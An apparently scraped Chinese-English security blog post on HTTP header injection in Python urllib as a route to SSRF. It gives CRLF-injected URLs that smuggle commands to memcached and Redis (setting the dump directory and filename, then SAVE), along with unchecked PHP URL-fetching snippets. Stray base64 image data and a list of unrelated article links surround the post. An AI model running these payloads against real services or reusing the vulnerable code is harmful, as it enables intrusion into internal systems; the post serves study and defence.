KK9pK3ZRKbWh6EDBOGvHc36d/Lm67YETjkbYbOzGJ0VgIKrtPSUC1bBQNthDe1CvKbFJWfxDrzlL5XcNW18nY8YnFVSaDJPCXy/jKOG22EzixjdOZdrmZN64m8mbw8kpynnY6NECtW3M8VxHdtGJeUXnkXbhZcdUravMnuRzynTos3UtbKo3e+L0PwTXHIB54+oFdt+9S5T6LmCGuVvGX0wY7wpsuRlbOzdBHhbPPgqnPOHnm7HrGwtZayZRYa3xepkzKNDs1XdBI/Kg+PWO2bWWpEI41qXU+E0O1MWVK6fTnF/fScvuEV1R+xLNxMWSkPZR+Bo540K+7MEJ5hHMN4H0IYtp0eNQ21goG2I5ytMOUngqv66XjE6oduaxh7H8RSecsYnVGPy9XzX9E5D3GAwCiooBj9dsnbZ1LH2NvWZ226aZPgqv4r6njEN1lnjJQWyPsgHPXErGRRnyyedZmEvpGWSit02fHRdO66Q95D8FnUMXNulL5/cNUo1w0fsd3TcPbMb3z3Po7PYzn77d64O2pAs7I3rFoDAcIDuB5qUQsAAAAAAADA71J+3Lk1v0KJcfEQktVk8YImxtAAXyVf4B1/1n7/MATDw+P1WwjxEmUkDXAabEXqBQlJ+iE8w5B6ICBvgOMxljS1F3jnR+N1a9l6yqRzznIGgKPok3e2YnPSrViv6MsBAA5HibOyinyaSJu77rX2H30DfBHp0VsbQL9Em+8TpKbJkTfAQbg650rb8cS5SjDnkKSkcw5wGKW80xZ4ct3Ojt1aM2aZiyFTawAAAAAAAAAAAAAAS/nOJtjlvukAv03Np/OQ0k8nJbZ0g2uQLkZpb069hwGnkxLyhktgrA41NuvOw0fKg8n5+a77ybKW1lKZIoSVw6Q+1EblNyVvtcGF0euhgw8nQTedRqiNMnykPGhEilQxPWwT8rG326Q5+bIwI8UPtdLL+KS9UTIB9kP2Qq1AWfXwkfWYknZVd8nbb9KcfkUEO5GbLF061PVGyQTYCUve9VByzYNpnzsPc2mXlh42hLJV3M+K+Ep5y4LKbri8doAvocbeVmO1QPMyz+KX5a33Snmvab1letprOBVq5twYarrbTxkpsjL2NjZuc4y9LXmvHHuroXxZuopP2hslE2BnxAywMU3t7h7LTZONaeo8zGVrPr1uUlSUQ1qWSZMR8e6wlZnzYlqPnjkAAAAAAAAAAAAAAAAAAABAB3+Ms852IowkuAAAAABJRU5ErkJggg==" alt="" />

0x2: Attacking memcached

类似于通过SSRF注入memcache,http header injection同样可以劫持server端,向内网的redis、memcache应用发起TCP请求,实现内网渗透的效果
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL

./fetch.py http://114.215.190.203%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:12345/foo

aaarticlea/png;base64,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" alt="" />

the above lines in light of memcached protocol syntax, most of the above syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

ERROR

ERROR

ERROR

ERROR

ERROR

STORED

ERROR

ERROR

0x3: Attacking Redis

./fetch.py http://114.215.190.203%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo

Relevant Link:

http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html

4.  其他场景

0x1: PHP URL解析库

1. CURL

<?php

    if (isset($_GET['url']))

    {

        $link = $_GET['url'];

        $curlobj = curl_init();

        curl_setopt($curlobj, CURLOPT_POST, );

        curl_setopt($curlobj,CURLOPT_URL,$link);

        curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, );

        $result=curl_exec($curlobj);

        curl_close($curlobj);

        echo $result;

    }

?>

2. file_get_contents

<?php

    $url = $_GET['url'];

    $content = file_get_contents($url);

    echo $content;

?>

3. fsocket

PHP的URL解析相关库在发起URL远程请求前,会对参数进行敏感字符过滤

5. 防护/缓解手段

PHP header()函数中提到了:
从 PHP 4.4 之后,该函数防止一次发送多个报头。这是对头部注入攻击的保护措施

Relevant Link:

http://php.net/manual/en/function.header.php

Copyright (c) 2016 LittleHann All rights reserved

HTTP Header Injection in Python urllib的更多相关文章

  1. python urllib模块的urlopen()的使用方法及实例

    Python urllib 库提供了一个从指定的 URL 地址获取网页数据,然后对其进行分析处理,获取想要的数据. 一.urllib模块urlopen()函数: urlopen(url, data=N ...

  2. Python urllib和urllib2模块学习(一)

    (参考资料:现代魔法学院 http://www.nowamagic.net/academy/detail/1302803) Python标准库中有许多实用的工具类,但是在具体使用时,标准库文档上对使用 ...

  3. python urllib和urllib2 区别

    python有一个基础的库叫httplib.httplib实现了HTTP和HTTPS的客户端协议,一般不直接使用,在python更高层的封装模块中(urllib,urllib2)使用了它的http实现 ...

  4. Python urllib urlretrieve函数解析

    Python urllib urlretrieve函数解析 利用urllib.request.urlretrieve函数下载文件 觉得有用的话,欢迎一起讨论相互学习~Follow Me 参考文献 Ur ...

  5. Python:urllib和urllib2的区别(转)

    原文链接:http://www.cnblogs.com/yuxc/ 作为一个Python菜鸟,之前一直懵懂于urllib和urllib2,以为2是1的升级版.今天看到老外写的一篇<Python: ...

  6. bWAPP----Mail Header Injection (SMTP)

    Mail Header Injection (SMTP) 本地没有搭环境,没法演示,附上转载的 https://www.acunetix.com/blog/articles/email-header- ...

  7. mail Header Injection Exploit

    Preventing Email Header Injection - PHundamental PHP Best Practices - http://nyphp.org/phundamentals ...

  8. python urllib urllib2

    区别 1) urllib2可以接受一个Request类的实例来设置URL请求的headers,urllib仅可以接受URL.这意味着,用urllib时不可以伪装User Agent字符串等. 2) u ...

  9. python urllib模块

    1.urllib.urlopen(url[,data[,proxies]]) urllib.urlopen(url[, data[, proxies]]) :创建一个表示远程url的类文件对象,然后像 ...

随机推荐

  1. 放松跑、间歇跑、节奏跑和LSD

    放松跑(easy run),顾名思义,是没有负担的跑步,通常用于高强度训练之间,让机能得到恢复. 间歇跑(intervals),又叫变速跑,通常是用高于实际比赛速配速的速度进行反复短距离的快跑,当中配 ...

  2. Linux shell循环

    条件测试 格式 test condition 或 [ condition ] 使用方括号时,要注意在条件两边加上空格,如果有操作符,运算符之间也必须有空格 测试状态:测试的结果可以用$?的值来判断,0 ...

  3. 分析cocos2d-x中的CrystalCraze示例游戏

    cocos2d-x自带了不少示例,以及几个比较简单的游戏,不过这些游戏都是用javascript binding(SpiderMonkey)做的,所以我猜测javascript binding可能是c ...

  4. java并发:线程池、饱和策略、定制、扩展

    一.序言 当我们需要使用线程的时候,我们可以新建一个线程,然后显式调用线程的start()方法,这样实现起来非常简便,但在某些场景下存在缺陷:如果需要同时执行多个任务(即并发的线程数量很多),频繁地创 ...

  5. ZeroClipboard / jquery.zclip.min.js跨浏览器复制插件使用中遇到的问题解决

    之前写过一个淘宝优惠券连接PC端转手机端连接的小工具,当时写到将转换好的url复制到剪切板这块时解决了IE和火狐,就是没办法搞定Chrome,知道可以通过flash搞定,但是觉得太麻烦没有仔细研究. ...

  6. nios II--实验4——按键中断软件部分

    软件开发 首先,在硬件工程文件夹里面新建一个software的文件夹用于放置软件部分:打开toolsàNios II 11.0 Software Build Tools for Eclipse,需要进 ...

  7. ASP.NET MVC 数据库依赖缓存的实现

    当数据库中的信息发生变化的时候,应用程序能够获取变化的通知是缓存依赖得以实现的基础.应用程序可以通过轮询获取数据变化的信息,使用轮询的话也不可能重新查一次后再和以前的数据做比较,如果这样的话如果我一个 ...

  8. 实现解耦-Spring.Net

    spring.net属于IOC(中文名:控制反转)的思想实现. 概念解释: 控制反转概念: 控制反转(Inversion of Control,缩写为IoC),是面向对象编程中的一种设计原则,可以用来 ...

  9. Quartz.NET 入门

    概述 Quartz.NET是一个开源的作业调度框架,非常适合在平时的工作中,定时轮询数据库同步,定时邮件通知,定时处理数据等. Quartz.NET允许开发人员根据时间间隔(或天)来调度作业.它实现了 ...

  10. 【原创】解决jquery在ie中不能解析字符串类型xml结构的xml字符串的问题

    $.fn.extend({ //此方法解决了ie中jquery不识别非xml的类型的xml字符串的问题 tony tan findX: function (name) { if (this & ...